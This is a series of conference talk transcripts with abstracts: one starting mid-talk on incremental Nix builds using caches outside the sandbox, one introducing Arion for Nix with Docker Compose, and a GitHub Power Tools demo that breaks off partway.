has been rewritten and the name of the path has been changed so that it matches the actual content of the path. That's the meaning of content addressable. Of course there is a problem because the path, they reference themselves and you need to compute the hash on something and you would never hand. So basically you just remove self-references, compute the hash and then reinsert them and so it's not perfect content addressable, so it's like content address module reference. What's interesting in there is that if everything is working correctly, this I3C cache, the thing that I built, it's still cached, okay, it has a different hash but if I make it content addressable, then you see that you get the exact same hash here and this means, and we can check that but it doesn't make any sense because it's the exact same store location but if you try to diff these two things, you will see that there is no difference. Well, that's obvious but you can try if you want. And of course the one that remains to be tested is this RCC, yeah, small, whatever. And that one should also give us the same output. Yes, that's working. Well, in this case you may not believe me because it was already in the cache before but trust me, you don't want to wait five minutes just for that to build. So that's kind of part and answer. We have broken everything. There is no sandbox at all and we still manage to get the exact same output, right? So this sandbox is not like, it's not totally needed. It's there to guard you against making mistakes. It avoids typical issues. It avoids the network if something is trying and you don't want it to try but if you configure everything properly, then it should build the same outside of the sandbox or inside the sandbox. And in this case, you have different vision, different contents before and then this is the image that was there if there was some issue with the demo but I guess you got the idea. So what we have now, it's a bit like before but well, you know, you compile Firefox, it takes a lot of time, you see that it's making progress, you've done most of the rest and then C++ is over and you will enter the fix up phase. And then, oh, it doesn't work. But then you are not back from scratch, right? You can recover some of the work that has already been done. So that's better. So that's a few messages. Well, this presentation is not about sending messages. It's more like challenging so I would like to get feedback if it gives you an idea that's perfect but like the main message is that you can bridge a sandbox and it does not mean that you are doing something wrong but well, that you should know what you are doing mostly. It's really nice. And when I see that, I'm like, yeah, it's going to work. We really get these incremental builds inside Nix packages and that's something that I really want. I think it will also be really useful to get fast CI answers. So if you want to make a pull request to Nix packages, then you could get the answer within like a few minutes and not a few hours. And also, like, it also means that we can trust other tools. Like RCC is doing its best to make it reproducible, hermetic and all of these nice properties. C cache is doing its best but it's very old so it doesn't know everything. And then these tools, they are just C compiler abstractions but they behave exactly the same as RCC behaves exactly as Bazel, for example. So it's just that RCC manages only one C compile but Bazel manages a set of files. From the outside, meaning from the Nix point of view, it's exactly the same. It's a tool that's trying to execute something remotely and get the results. So if we go that way, we could consider trusting Bazel, for example, for doing things purely and correctly and allow it to have access to a cache and a remote execution engine somewhere. So that's it for me. I have questions for you if you don't have any. So think about it. What about verifying some compiler cache instruments for reproducibility so that they can be really trusted and not just relying on limited amount of experiments? Well, I guess that's always the same thing with reproducibility that you have to test it. And every time it's reproducible, that's good. But it's not a proof that it will never be reproducible. So we can do that with these tools too. We can just start to include them and then compile, compile a few times and then once in a while just make a perfectly aromatic sandbox build from scratch and see if we are still building the same thing. And that would give us more confidence that the tool is working correctly. I mean, maybe the problem is that when these tools had been designed, there was no thought about such thing as reproducibility. And it might depend on different things like system clock, for example. Well, truth is I'm not aware of all the details of all of these tools. So that's something that we have to explore. It's like, look, it's feasible. Does someone want to work with me on that? So one idea came to my mind when you showed mounting the file inside. Did you try to mount like a unique socket, maybe, I don't know, Ccash and SCcash very well, but maybe you can try networking that way? I tried and then I had no more time. So I think that theoretically it could work, but I don't know enough about all the technology details. On the outside looks trivial and then when you try to set up everything with the namespace and stuff, well, it breaks easily. So that's something we can try tomorrow. If you think that it can be done in a few hours, then I would really like to try. Cheers. Hey, first I wanted to say I really appreciate because I've been many times in the situation where I wanted to package something large like Ceph, for example, we're also iterating on bugs, building Ceph takes one hour. I had to build it over 80 times so you can imagine that took a while. So I really appreciate any effort going in that direction. Same thing with Haskell, which when you work on GHC, for example, or iterate on a low-level library and rebuild NICs packages can also take a very long time. So I think this is really good. I wanted to also point out another approach that is a little bit orthogonal to what you've presented that we just discussed yesterday here at the table with, I think, Edef Pi and me, so NH2, which was that you can also do the type of caching that Ccache, for example, does specifically for like C things on the syscall level. So we could, if we wanted to, P trace the entire build and then see that if, let's say, an execve produces a certain output, we can cache that and then wrap any execve call that happens again to produce exactly the same output again. So that is, of course, somewhat in the further future, but that might be something that can be very generic across multiple things. I think practically I will first go with exactly this approach because you have now shown that it works and it's great. And I just need to see how one can get the same thing for GHC Haskell, for example. But in the long term, that might be something that if we agree on enough, bringing enough hackiness into this thing as a kind of like quick developer thing we might do as well. Well, it's not really a question, but I have still two answers for you. Well, it's funny because I had the exact same discussion with NBP like last year and the year before, like, well, we could do that on the syscall level. That would be fun. Through this, it's not that easy. You have lots of cache entries and et cetera, so you need to be really, really efficient. It's a cool idea, but I'm not sure it will turn out as practiced, but I'm always available to talk about that idea. Thank you. Oh. Thank you. Thank you. Thank you. Thank you.
This talk will present experiments at building packages incrementally by relying on an external cache outside the nix sandbox. We will show how tools such as distcc and bazel can benefit from impure information during the build, and discuss how this impacts purity and reproducibility.
10.5446/50687 (DOI)
is going to talk to us about some containers on Nixus and some Docker compos goodness. Alright, yeah, so this talk is about Arion. I'm Robert, I'm co-founder of Hercules Labs. We're actually at launch of Hercules CI this week, so that also means I've been a bit busy, so I hope this presentation is sort of going to plan. Alright, let's get started. So Arion, come on. Probably window focus. Alright, it's configuration language, so to speak, for Docker Compose. It's based on the Nixus module system, and it's also the tool that you can use to actually create the containers and restart them, that kind of thing. It's named after a horse. It's a divine horse from Greek mythology, and we chose the name because, well, obviously we have a Greek mythology in the name of the company, and it's a very fast horse. I'll get to that. And it's also a bit of a mix, I can talk. I thought it was appropriate. So yeah, the way this came to be is we were looking for a process manager kind of thing for our local development environments. We've been using Supervisory for Cachex, but it had some problems with properly terminating processes, so we were looking for something else. I've worked with some T-Mux automation, but that was a bit too custom, and it's not really designed for this purpose. It looked into system D, but that doesn't really support project-based stuff very well. Mixed-west containers, those are obviously very nice, but for project development, if you want to do stuff like live reloading, it was a bit, well, not flexible enough. You need to bind-mount stuff into the container, and maybe this has improved, I don't know, at least at the time. Mixed-west containers weren't a good option for this problem. So we considered Docker Compose. I guess I don't have to talk that much about Mix on this conference in terms of basic explaining. It's really nice to have a programming language for your configuration, and with Mix, we can use the module system, which is really nice. So, yeah, the way we started to develop this sort of solution is to just try things out. So this is what I ran. Just Docker run. It has the Mix store bind-mounted right into the container, so you don't have to rebuild everything or build images. And, yeah, you don't really need anything else, basically. Or at least as a starting point, you don't need much else in your container. So we just want to scratch, but that's not an option for some reason. So you put a file in there with, like, Roots and Nobody. That actually works. But, yeah, so we had to create the image. It was pretty clear that we need something like Docker Compose to actually do this. It was already sort of the plan. So Docker Compose is a system that lets you define multi-container applications and perform operations on them, like building all the containers, building all the images, I should say, and starting them, destroying the deployment, all the kind of things you expect from a deployment tool. And a basic configuration file looks like this. It's YAML. People might have opinions about it. The nice thing is it's a super set of JSON, so we can easily write these files from NICs. Yeah, so what you see here is a set of services. It's like a dictionary kind of thing. So this is a service name. This basically says look in the current directory for a Docker file, and it'll use the service name as the image name. This will expose port 5000 to the host, and there's an extra service for the back end. So Arian, it really started out as just a small bash script that did a thing for us. But with the module system, it's really easy to refactor, and it was quite fun to make it more of a self-contained thing. So as it grew, we open sourced it around December, I guess. Yeah, so I think we announced it, and since then, it grew from, I think it was 200 lines of bash code, grew into 317. It's not that bad. Actually, bash is a really nice language for this kind of thing. But up to a point, we were thinking of some features that would be hard to implement in bash. So we switched to Haskell. That did double the lines of code, but we think they're more maintainable lines, so in the end, that should be a good thing. But really, most of the project is Nix modules, and some support code, like tests, of course, that also add to the line count. All right, so demo time, always interesting. See if it works. All right, so this is inside the repo checkout. There's an examples directory. You should have a look at it. But I'll also show the basics. So these are, obviously, the result is, it shouldn't be there. But there's Arian packages and Arian compose files. For the boot strapping, Arian needs to find some version of Nix packages. Often in projects, it's the case that you have a specific version of Nix packages. I mean, this is before Flix, right? So, yeah, you have some version of Nix packages, probably some overlays that are specific to the project, and you want to use those in your deployment. So in this case, it's a very simple invocation of just Nix packages with the system set to Linux. That's what you're deploying most of the time. And that's really just for bootstrapping and for providing the packages argument to the modules. And then we have the compose file. It looks quite a bit like NixOS. The NixOS module system is basically independent of NixOS, and you can do a lot of cool stuff with it. It doesn't have to be NixOS itself. So in this case, we did have, we did insert the packages just like you have on NixOS. But these are Docker compose services. And so one of the nice things is the ability to share the host store. So you don't have to build images when you're coding. And yeah, I think this should be somewhat self-explanatory. It's a web server. And now you can start it with the up command. Yeah, so it's actually started. It doesn't produce much output. I've already built the thing. So what happened behind the scenes is the NixOS, I should say probably the Nix module system was invoked to evaluate that configuration. It was built with Nix build to produce the Docker compose file, which has all the references to stuff like this path here for the Nix documentation. And that just makes it work. If I go to local host, 8000. My browser is a bit shy. It turns out. That should do. There it is. All right. So this is a fairly, as it says, it's the minimal example. This is just using Nix and Docker compose. But we also put some effort to support NixOS on this. I'll stop this deployment. It's actually called a project in Docker compose terminology. And I on its composition project is a bit overloaded. All right. So it's still services is still an area level service. It corresponds to a Docker compose service. But we have some extra fields here provided by one of the area modules, which takes care of the NixOS integration. So everything below the NixOS configuration is passed into the NixOS module system and evaluated there. And this automatically sets the service command field to the system D or in its invocation for NixOS. And it configures the Docker with the right settings. Took a bit of research to get it to work. But there you go, I think. Name service, gosh, didn't start well. I don't think we need that. Sorry? And it works again. It's basically the same thing. But now it's running with much more stuff around it to clean up slash that kind of thing that most containers don't need. But if you need it, it's really nice to have it, I guess. Yeah, so that's the basic thing. Yeah, so there's lots of nice things you can do for development. For example, we're using bind mounts to do live reloading or hot reloading of our services, which makes for a nice development experience for a quick iteration loop. So I thought it would be nice to talk about the module system. I think it's really cool. It's a really nice way to work with a certain type of complexity, so to speak. It's the kind of thing you see in NixOS. But it also really applies nicely to, well, to Aion, of course. And I think there's lots of applications that benefit from the module system. For example, I think there's a talk from IOHK about the Haskell.Nix alternative Haskell infrastructure. I think that's using the module system. And I really like it. Okay, so one of the basic things you need to know about the module system is that there's basically no difference between your configuration and other modules that are usually provided by, say, NixOS or Aion in this case. So I think this is really an important feature because it lets you factor things out into separate modules and actually take advantage of having a programming language as your configuration language. Yeah, so this is what a basic invocation of the module system looks like. It's a bit of a contrived example, but I'll walk you through it. Suppose you have a call of Nix packages. All you need to do is call lib.eval modules. And by the way, if you don't have Nix packages itself, you can directly import the lib directory, so you don't have to choose even a system architecture in advance. But if you do have Nix packages, you can take it from here. And you just invoke it. You tell it where the modules are. And you get back an attribute set with config in it. It's the same config that you get passed into the modules. So this lets you use the config in whatever context you have. Yeah, you always have the lib argument pass to it that's built into the module system. Also, options lets you do introspection into which options are available. Packages is actually a bit of a lie. That one is not built into the module system itself. So if you want to have it, you actually need to declare it as an option. You should probably have put that on the slide. Well, ask me after the talk. Yeah, and so this should be, I guess, more familiar. The config prefix here is optional. So if you're not declaring options, config, or imports, but just foo is whatever, that actually means config.foo. And these values are then combined with the other modules in the configuration. And so, for example, here, bar should probably define config.bar to some value, and it's made available here. But this module is also free to declare its own config.bar. And if there's two definitions, in the module system, you can have a merge function that combines the two values. So this config will always have the combined values from all the modules together. There's some sort of fancy things you can do. Ariane relies on submodules. Basically, whenever you see angle brackets name in the NixOS documentation, that means that's a submodule, and in NixOS, usually, they're just data, so to speak. But that's not necessary. You can actually do anything you like in these modules. They're proper modules. So in Ariane, I didn't really expect this because I was more familiar with the way it was used in NixOS, but I didn't really look into it that much yet. So it was only recently that I refactored it into proper submodules, so you don't have to manually call the module system for each of the services. It's just a type that says services are submodules, these modules. So that's really nice, and you can actually do stuff like imports in this sort of sub tree of the composition. And that means that this file will be evaluated, and it can only set things for services.web itself. It's in its own namespace. This is something we figured out. The module system relies heavily on lazy evaluation to make things work, because obviously when you're declaring the config, but you're also getting it back as an argument merged with other things, that's recursion going on there. Because of laziness, it can actually work. But I used to be quite wary of it. I've run into situations where there was an infinite loop due to the way things are structured in the module system. So it's nice to discover that some things, some of the more fancy things actually do work. Because normally when you So when you declare the configuration, the structure of that attribute set should not depend on the configuration directly. It's kind of mind-bending, but that's what it is. So it turns out you don't actually need to do that all the time. In some cases, you can, for example, look at options instead, which is available sort of earlier in the recursion. And you can use it to check whether some options are available. We've used it, for example, to provide a better NixOps integration in the Hercules CI agent. If you just declare NixOps specific stuff in NixOS, you'll be declaring values that are undefined. There's no deployment namespace in NixOS, so that's an error. So with this sort of pattern, you can make this optional. And I think this will be very useful if we sort of decentralize NixOS, which I think is a really good idea. And with Flix, it actually becomes feasible to do so. You can use this to detect whether something is available or not, provide a better experience when people have some combinations of modules in their configuration. Yeah, so like I mentioned, the submodules are proper modules, so you can actually use them to do computations on your configuration. So for example, in Arian, we have the service.environment variable, which has all the environment variables for the service. And it needs a tiny bit of processing, almost no processing at all, actually. But this is actually declared in the service level modules. So usually in NixOps, you see that there's some computation that maps over all the modules. But you can actually move some of this computation into the module itself, and that cleans up the code nicely. So in Arian, each service is responsible for its own piece of the YAML file. One thing I noticed is lists can be annoying to work with. In particular, we've worked with the capabilities in Docker Compose. So with Docker, you can use Linux capabilities. There are basically ways to restrict the security context of a container. So we can disallow stuff or allow stuff. There's a default set of capabilities that a container has. And Docker Compose lets you modify that set so you can remove things from it. You can add things to it. And so the obvious thing to do is model these fields as lists of strings. But that's a bit annoying if you have a service that splits into modules, because combining those lists is not very obvious. What do you do if one of the modules says this capability should be removed and the other modules says it should be added? So changing that to an attribute set makes it much easier because then the module system takes care of this. The module system lets you use priorities to override lower priority definitions. So this makes for a nicer interface. Yeah, and while developing the system, yeah, I noticed that it's when you're constructing a new system, it's best to start with the low-level stuff and then whenever you need something on top of that, you can do it in a separate module. So I really recommend to do so. It's easy to add things to a new module, but that can turn into a mess. Yeah, so in the future we'll be looking at integrating better with Flix as they evolve. We're going to improve the image support and we're looking into caching the evaluation to improve performance for commands that don't need to rebuild. And we're thinking about how to deal with more distributed applications of the module system. And one example of a sort of an experiment we're doing is project.nix. It's really not ready for prime time, but basically the goal is to standardize the glue code that you find in many projects. Like how do you overwrite the Haskell packages or all those kind of things. It's nice to have options that have a nice definition and can be reused in language integrations. Thank you. Any questions? So I'm not sure if you touched that in the introduction because I wasn't here, but how would you put that into production? Of course you have a Docker compose setup, but is this Docker compose YAML like distributable so you can use stuff like Docker stack to put that into production? Right, so we don't have a complete deployment story yet because we're not using this for production services. So that's kind of a question. We also have Docker compose is a frontend to both Docker itself and Docker swarm. So at least in theory it should be easy to actually do a swarm deployment using this. So that's a way to go I guess. And the way you wire it up into your deployments, I think that really depends on the technology that you're using. So yeah, can't say much about the specific of that. But it's definitely feasible. I think it's not a good idea to use the host store on a production deployment. It's better to use the image support that's built into this. We haven't used it with the registry yet. We've only used Docker load. So I don't expect any problems with pushing to registry, but we just haven't done it yet. So my understanding is that we need some kind of frontend and NICS expressions to describe how we create a cluster of containers with services or systems with services and then some back end to generate the YAML file. I haven't used it too much, but my understanding is that NICS ops has some representation for describing such a cluster and then various back ends. Did you consider adding a back end to NICS ops to generate Docker compose YAML files? Not really, to be honest. And I think it's been worthwhile to take another approach. There's some overlap between features that are provided by NICS ops and Docker compose. So Docker compose basically has all the state in Docker, whereas NICS ops needs an extra state database. So it's actually nice to avoid that complexity. Yeah, I think something similar can be done for NICS ops, but it's probably best to take a different approach there because it's just structured a bit differently. Hey, what is the story about garbage collection routes and how much space will it occupy and how to clean up? Great question. Currently it's using a temporary garbage collection route for the duration of the command. So when you run Docker up without any other arguments, that's sufficient because it's only running as long as the Docker up command is running, but when you're using detach, the command will terminate while the deployment is still up. So in that case, you technically have a risk of garbage collecting a live deployment. That's not great. For our purposes, this has not been a problem, but if you deploy, I think that's one of the main reasons to go with images rather than using a host store. The images will not be garbage collected. Yeah, that's that. I think I mentioned evaluation cache. I think it's a good idea to change Arion a bit to be more aware of where things are deployed so we can both create a garbage route for that deployment on the user system and reuse the YAML file to speed up commands like Arion logs, for example, so that it doesn't have to reevaluate the entire deployment either. So that will also improve the garbage collection situation. Okay, so if that's all the questions, okay, one more from the man before lunch. Yes, I just wanted to, well, it's not a question, it's an answer for friends. So what we are deploying to Amazon and what Arion gives us is that we can share the module system between what Amazon runs and what runs in the Docker. And that's the biggest addition here, because the Docker is just, well, runtime protection system in that case, and it takes care of port sharing and all of that. But we are essentially running the same kind of process and the same kind of configuration as on the machine stand. And that's a nice thing of reusing the module system. Yeah, so, yeah, that's it. Thanks. Thank you, Robert. And thank you.
An introduction to Arion: learn why we built it on top of Docker Compose, how it integrates with Nix and how you can use it. As Arion is mostly an application of the Nix modules system, we share our experience of building it. Arion is a tool that integrates Nix and NixOS into Docker Compose. - introduction to Docker Compose and Arion - how to write a deployment - how Arion uses the Nix module system to its advantage - what's next for Arion Arion started out as a little bash script with the goal of doing process management for our local development setups internally for Hercules CI, on top of Docker Compose. It has since grown to become an independent tool with support for NixOS in Docker, a significant subset of docker-compose.yaml and support for building actual images. Arion is written with the Nix module system, which means that deployments are as powerful as Arion's internals and that you can build your own abstractions into your deployments. It also means that the format of its logic may be familiar and it's easy to contribute.
10.5446/50643 (DOI)
All right, welcome. Hello. Welcome to GitHub Power Tools. As you can tell, that's where we are. This talk has no slides. We're just going to do things together. I might leave a repository that has some notes in it at the end or something like that, but otherwise, take notes. You'll probably have some opportunity to interact a little bit through a repo if you want. If you've got a laptop, as you've noticed, the Wi-Fi here is amazing, so you shouldn't have any trouble getting on GitHub and working here. If you happen to be staying across the street at the Radisson, you know that Wi-Fi isn't always amazing. So it's nice to be here. Everybody enjoying the show so far? Good. All right. Next question. Who is using GitHub right now? Almost everybody. Who is not using GitHub right now? Don't be shy. It's okay. We can still be friends. All right, cool. Well, what I hope to show you today is a few features in GitHub that you don't already know. Some of this stuff you might know. I've given this talk before and I've had some people say, well, gee, those aren't Power Tools, that's our normal workflow, so maybe you have a sophisticated workflow. I think everybody's going to pick up at least a few tips. And hopefully, really by the end of this session, you should have kind of the core set of features down that I think are really important features for you to be working with. We'll be doing most of our work in the browser. I'll downshift to the command line a little bit. We'll look at things from command line git, probably, that'll make sense. But really, let's dive in and let me show you what I'd like to do. Now, I am going to do this all in GitHub. And so we'll call this NDC Oslo 2014. That's the name of our repository. That's going to be a public repository. So all of you will be able to see this. The whole internet will be able to see this. And with that, yeah, good enough. I'm just going to create that repo and we're done. So there. We're going to create a repository now. And this is not a path you go through all that often. I wouldn't quite call this a power tool. This is kind of preparatory stuff. But still, you don't create new repos. Most of us don't create new repos all that much. You jump into a project that's already there. So this is a somewhat unfamiliar path. And because it's an unfamiliar path, GitHub gives you lots of help there to show you what's up. What I'm going to do is I kind of have to jump ahead a little bit because I'm going to use the built-in issue tracker to keep track of our agenda. So issue tracker is a thing on our agenda. But I have to use it to build the agenda. So let's go ahead in here. I am creating a new issue. And this will be our topics for the session right here. And what should we do? Well, I'd like to cover pull requests. I think that's really important. I want to talk about forking. Make sure everybody's very clear on what forking is versus what branching is. We should cover issues. I used to teach people how to use GitHub for a living. And when I did that and we'd get into the issue tracker, the most frequent thing I heard was, oh, it has an issue tracker? Like, yes, it has an issue tracker. And it's pretty nice. It's very simple, very lightweight. But you can do some nice things with it. So we'll talk about issues. We'll talk about animated GIFs. That's a very important feature. There's no way we could really survive without that. GitHub pages. There's also built-in website hosting for free with every public repository. My blog, timberglenn.com, gets about one post every six months. So it's not exactly a heavily trafficked blog, but that's hosted on GitHub pages. So I don't pay anybody web hosting for that. That's just public repo on GitHub. GitHub pages and maybe some prose composition tools. We'll take a little bit of a look at how to use GitHub for non-code things. There's a whole lot of work that you can do. Oh, wait, I forgot something. The so-called web flow, we need that. There's a whole lot of work you can do in GitHub. That has nothing to do with code. Now, most of the time, you're going to want your artifacts to be text files, but a lot of knowledge gets created and collaborated on in forms that could be done as text files. So we'll take a look at some prose composition tools and ways even so-called non-technical or non-coding people can use GitHub to work together. So there we are. Anybody else? Any requests? Something else you want to see? No. All right, we should come up with one. Let me know. I maybe can't hear you. I certainly can't see you. All I see are two bright lights. As far as I know, I am about to be abducted by UFO, and there are no other human beings in the room. But what's that? Rebasing. OK, rebasing is more of a get thing. And so if time goes well, if I don't talk too much, that's unlikely, frankly. We'll talk about rebasing. That is a great feature. It's more of a core get thing. So might not get to that there. But there we are. There are our topics. So you notice that I was using Markdown, the Markdown syntax, which I'll come back to. And it's rendered for me now. I've got that nice big topics for the session, heading and a bulleted list. And I have a collaborator already. I want to see more of this. This D-Gram guy, whoever he is, I like him. All right, so if you want to jump in on anything I'm doing, any pull request, any issue, if you know how, if you've got a laptop, do it. Now, David has sent me a coded message. The squirrel wearing the fedora. What does that mean? Well, let me mouse over. He's trying to say get to work. This is kind of an inside GitHub joke. That squirrel to them means ship it. So let's go ahead and ship it. All right, let's go back here. This is in the issue tab here. I'm going to click on the code tab and go back to this view. Now, this is an empty repository. There's not a lot I can do. Normally, I would be cloning this down on my computer and using Visual Studio or a text editor or an IDE of some kind to work down there. But again, we're going to stick to the web flow here. So I'm going to follow GitHub's directions. It says, every directory should include a readme. Well, I click on readme and suddenly I'm in a text editor. I'm editing a file called readme.md. So let's go ahead and do this. And this will be the NDC Oslo GitHub Power Tools, various cool GitHub features, jokes, squirrels. And probably, I will not be able to stop some American slang happening. It just comes out. So stop me before I kill again. There we are. So now I have created the readme and I can commit that file. When I do that, I'm back to this is like the normal, familiar GitHub view. You guys are all GitHub users. We're finally looking at the code view, which makes a little bit more sense. One thing, any file called readme, that's a magic word in GitHub. And it's going to be rendered on the project page. And people can get quite elaborate with their readmes. You can put in there, in this case, it's a markdown file. You can use the markdown syntax to embed images and have highlighted syntax, highlighted code, and all these cool things. And I'll probably do some of those as we move along. That lets you put a fairly substantial project home page in your readme. If it's an open source thing or if it's a thing inside your company, this should give people an idea what the project is, how to get it, how to build it, how to use it. If it's an API, a code sample, if it's a tool, how to run it, you can put all that stuff in the readme. That's not what I want, though. I want to type in some poems. So I need to create a new file. Let's think about this, though. Let me go back to my agenda. I'm going to open that agenda in a new tab. Here's my Power Tools agenda. Webflow, webflow. OK. What are some things I could do? Now, I want to modify this repository. And most of you are GitHub users. So you know that if I'm going to do work, I should probably do the work in a branch. Probably don't just commit right against master. Now, there are times when committing against master is an entirely appropriate thing to do. I'm going to say, for the purposes of argument, today is not that day. I'm not going to commit against master. I'm going to make a branch. The good news is I can do that from the browser. Now, again, maybe you're doing this from inside the Visual Studio integration. Maybe you're doing it from the command line. There are people you work with who might be able to make GitHub work for them if they can do things through the browser. This is really important to some people. So I'm going to do this branch. And I'm going to call this branch Strange Ascetic. That's the name of the poem we're going to use today. Type that in. I create the branch. And I am now on that branch. It says right there, you're on the branch, Strange Ascetic. I can switch between the branches with that select box in a way that you'd expect. It's good. I've made a branch. Now, I will create a file. So to do that, right up here on this line, that plus there, when I click on that, I'm back in the text editor, creating a new file. I can even create directories. Let's say I want a directory called Poems. I'll say poems slash. And it says, oh, you must mean directory. And I'll call this ascetic.text. And we'll give it a title, the song of the Strange Ascetic. And we'll give a couple lines in there. Purple Vine. Slaves should dig the vineyard. I would drink the wine. OK. We have added that new file. Get started on some Chesterton, because why not? There we go. So I've got that new file. I can go back and look at the overall code view. Now GitHub has noticed, says, hey, you've got a new branch. It puts this line in right here. It says, do you want to create a pull request on that branch? I'm going to say not yet. OK, let's not do that yet. I want to make sure we know what we're doing. And I don't know if you ever use the web UI to check out what's going on in a project. You can get a very simple log view. I just clicked on where it said Commits. And now I can kind of see the commits that I've done. I can go browse the code for each one of those. So this helps right now, for example, in my role at Datastacks where I work, there's kind of a writing project I'm overseeing. It'll be a cool thing. It'll be available to the public in a few months. And I've got a non-technical manager who's interested in the progress of that writing project. Well, I can send that person to this page and say, hey, go take a look at these commits here. You can see who's writing, who's getting their work done, crack the whip, whatever it is that has to happen. There's nice non-technical uses there. All right, let me go in and throw one more commit in there. Higgins is a heathen. His slaves grow lean and gray. That he should drink some tepid milk exactly twice a day. Sounds very British. All right, good deal. Now, let's say I would like to ship that work. Let me go back to the browser. All right, all right. I just happened to notice something here. I'm looking at the screen at the page, and I see there is a pull request open on this repository. So you guys are doing what I asked you to do. Now, there are people in the room who don't know what pull requests are yet. I'm sure of it. I'm not going to take a poll. But I'm going to do a pull request first, and then whatever intrepid souls submitted that pull request. I will look at it. I'm not going to say I'll merge it yet, because I don't know what's in it. We'll find out. I'm going to make my own pull request first. So anybody else who wants to make trouble like that, I don't know who did this, but they're doing the right thing. If you want to do more of that, please bring it on. That's just going to make this more fun the more people get involved. All right, this is a little bit contrived, because this repo belongs to me, and I'm the only one who can write to it. And so I'm branching, and now I'm going to go through this very careful process of how I merge that branch. In the real world, sometimes I will use Git for things that are just me and me alone, like a zero collaboration project. I'm just collaborating with myself. And using Git and using GitHub can still be useful. I typically do not branch in those scenarios, because there's often not a lot of doubt about whether I want the work that I'm doing. But branching, you're going to see this in a minute as I do this pull request. A branch isn't just a way to separate work or to indicate that work is experimental. It's nice. If I'm working on a project by myself, I might say, well, I don't know how this is going to work out. Let me branch, and if it doesn't go well, I'll just roll back, and I'll delete the branch and forget about it. A branch is fundamentally in GitHub a place to have a conversation. It is not fundamentally a place to experiment. I mean, it is a place to experiment. That's true. But the most basic reason for a branch is that it's saying, this work, this stuff, I want to talk about this. So let me do that. I have created this branch called Strange Ascetic, and I'm going to take the bait and click on that button that says compare and pull request. I click to the button, and GitHub has done some stuff for me, and I need to point some things out on the screen. If you've ever done this before, this is really confusing. But right at the top, right there, it says, you've got this branch. That's that little symbol there. This branch called Strange Ascetic, and dot, dot, dot. The implication is it's coming from over here, flowing to here, going into the wrong direction. Sorry. Going from Strange Ascetic, and it's going to get merged into master. It's like those three dots there that should almost be an arrow that points into master. That's really what that means. We're considering merging Strange Ascetic into master. For my pull request, I gave it a subject, and I gave it a body. In real life, when you submit these, you do want the subject to be meaningful. You want someone to be able to look at that and get an idea what the PR is about. And if you want more detail explaining your work, like if you're submitting a PR to an open source project, you might want that description there to be like the body of a short email. And I have options in here. You saw I typed colon. So far, that's just text. And I typed colon, and I get this little pop-up. Well, now I am in the world of emoji. And on GitHub, emoji is a very important means of communication. I don't know how people get by without emoji. I don't know what life was like three years ago before it was a thing. So I type colon, and then I can type the name of an emoji character, and the list kind of narrows down. I'm going to go with sparkles. That's pretty conventional. And maybe metal. I mean, I'm in Norway, right? So some metal. And if I want to know what that looks like, I can hit that Preview tab, and I preview it. Emoji is there, and really, in general, this link right here. If I click that, I get a Help tab that opens up. And remember how I was saying how the Wi-Fi is great? There we are. OK. I get this awesome Help page that tells me all about this little markup language called GitHub-flavored markdown. What I'll do is I'm just going to do some markdown things as the talk proceeds. I might not stop and explain each one. But when you see me do something that doesn't look like plain text, that's because it's GitHub-flavored markdown. All that stuff is documented in here. It's good stuff. And we'll leave it there. So I have now created a pull request. And remember what that pull request means. That pull request means I want to talk about this. It might also signal that I'm done. And that's often the open source mode, when there's this thing out on GitHub and you need to fix a bug. Then you fork it. We'll talk about forking a little bit. You make your changes, and you submit a pull request with a complete bug fix. And the meaning of that is basically you're saying, here I made this for you. Please take it. Fundamentally, you're saying, I'd like to talk about this. And you can even open a pull request before the work is done, like I have here, if you want the conversation to go on. All right. So it looks like I have some collaborators. And this is good. This dgram guy has given me an animated GIF. And let's see. Aha! JEP 13 has legitimately pointed out a bug. Thank you. I'm going to wait on that. I appreciate the collaboration. But I have an agenda here. And I'm going to show you something else in a little bit. I'm going to wait on that. But let me show you how he or she, I don't know who this person is, this person, did that. Over here in the files changed tab, I'm actually able to make line by line comments on all this. Now, this clearly should read, if I had been a heathen. And that's where the bug is. So what JEP 13 did was just mouse over to there, click on the little balloon. And I just had a little conversation with this person. I possibly have never even met online with emoji in there. So that's important. And as if we're doing a little bit of code review. I love it. Life isn't over. The work isn't over just because I submitted the pull request. I can keep working on that branch. And any commit I make to that branch is going to show up in this pull request. I'll prove that to you this way. Here, let's go back here. And actually, what I'd like to do, if you don't mind, is I'm going to figure out how the clipboard works. There it is. Hey, it's GitHub Power Tools. It's not clipboard Power Tools. So I've got a copy down here. I could do some work on that branch right here. In fact, I'm going to do that. I'm going to check out strange ascetic. And now we see we have a Poems directory with that file in it. So I can do some more work down here at the command line. I had been a heathen, have praised Naira's curls, filled my life with love affairs, my house with dancing girls. Trust me, this is going somewhere good. Completely classy poem. You have nothing to worry about. So I'll just add it and commit it, assuming that we kind of basically know some command line get stuff. And if you don't, I can connect you some people who can help. So here we are. Make that commit and push it. And as I push that work and I go back up here and into this PR, that new commit shows up down at the bottom as Naira. And actually, the cool thing is, if you're on the pull request page and you see end commits come in, they'll just automatically, they're auto-detected and they just show up in front of you. So if it's an active pull request, you will just see the page changing in front of you. So let's just consider this good for now. It doesn't really look done, but I'll say this isn't quite right, but you can't make an omelet without breaking a few eggs. That's kind of an American idiom that means essentially YOLO. Now what I just did there is I went to my desktop, Explorer, Finder, whatever, grabbed a GIF, dropped it into this comment box. Comment boxes are a magical place. Not only does markdown work, not only does emoji work, but they are drag and drop targets. And when I drop a file on there, it just uploaded that to this place, cloud.githubusercontent.com, whatever on Earth that is, and replaced the drop target with markdown pointing to that file. So now that image, that's how those people were getting those images in there. Just drag and drop. It's as simple as that. So YOLO, it's not done, but we're going to merge it anyway. And there we go. The pull request is now closed. This conversation is basically over. And when I go back to my main pull requests tab, that is gone. Number six is gone from the list. So if you don't mind, I'm going to look at a few of these and just kind of see what people are thinking. Here someone has edited the readme. And what they have done is, as you can see, removed that last bullet. So now I am not permitted to use American slang. And the bummer is about that, that you know how it is. Sometimes it just comes out, and you don't know you're doing it. So I don't know if I can really merge this. I'm going to think about it. I'm going to say, I can't make any promises. All right. I'm going to let that sit on the side for a few minutes. Dgram says it needs more squirrel. Now what did he do? Yeah, he added a bullet for additional squirrels. That sounds good to me. Now this is a diff. This is a diff of a markdown file. And it's a trivial markdown file. So there are, I think, zero people in the room who are confused about what's going on right now. Somebody added a line, and it shows up with a plus and in green. You saw the line that was removed had a minus, and it was red. You get it. What is harder is when it's a complex piece of text with lots of stuff that has changed. I'm going to try to come up with a more interesting version of this in a few minutes. But I want to point you to these two tabs. They're very easy to overlook. Source is pressed. I'm looking at the source or the actual markdown. When I click on rendered, now I see the rendered markdown with, and 